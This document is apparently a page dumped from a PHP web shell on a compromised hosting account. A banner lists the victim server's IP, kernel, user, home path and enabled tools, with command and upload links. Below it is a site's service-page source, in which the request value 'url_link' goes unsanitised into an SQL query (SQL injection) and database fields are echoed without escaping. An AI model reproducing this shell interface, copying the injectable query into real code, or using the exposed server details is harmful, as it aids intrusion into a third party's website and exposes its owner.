Server IP : 103.53.40.154 / Your IP : 3.142.136.210 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/agarsarbharat.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include_once('admin/config.php'); $cat_url = $_REQUEST['url_link']; $querydt="SELECT * FROM `tbl_service2` WHERE `url_link`='$cat_url'"; $rundt = mysqli_query($db,$querydt) or die("Query Not run"); $datadt = mysqli_fetch_assoc($rundt); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title><?php echo $datadt['meta_title']?></title> <?php include "top-links.php";?> <style> .service{ padding-bottom:20px; } </style> </head> <body> <!--header --> <?php include "header.php";?> <section class="inner-header divider layer-overlay overlay-dark-6" data-bg-img="img/breadcrumbs.jpg" style="background-image: url('img/breadcrumbs.jpg'); background-position: center; background-size: cover;"> <div class="container pt-120 pb-60"> <div class="section-content"> <div class="row"> <div class="col-md-6 p-4"> <h2 class="text-theme-colored2 font-36">About Us</h2> <ol class="breadcrumb text-left mt-10 white"> <li><a href="<?php echo $wspath?>">Home </a></li> <span> | </span><li class="active"><a href="about-us.php"> About Us</a></li> </ol> </div> </div> </div> </div> </section> <!--marquee --> <?php include "home-marquee.php";?> <section> <div class="container service"> <div class="row"> <div class="col-lg-6"> <div class="text-center"> <h3><?php echo $datadt['name']?></h3> <p> <?php echo $datadt['desc']?> </p> </div> </div> <div class="col-lg-6"> <img src="<?php echo $wspath?>admin/images/services/<?php echo $datadt['image']?>" > </div> </div> </div> </section> <!--footer --> <?php include "footer.php";?> </body> </html>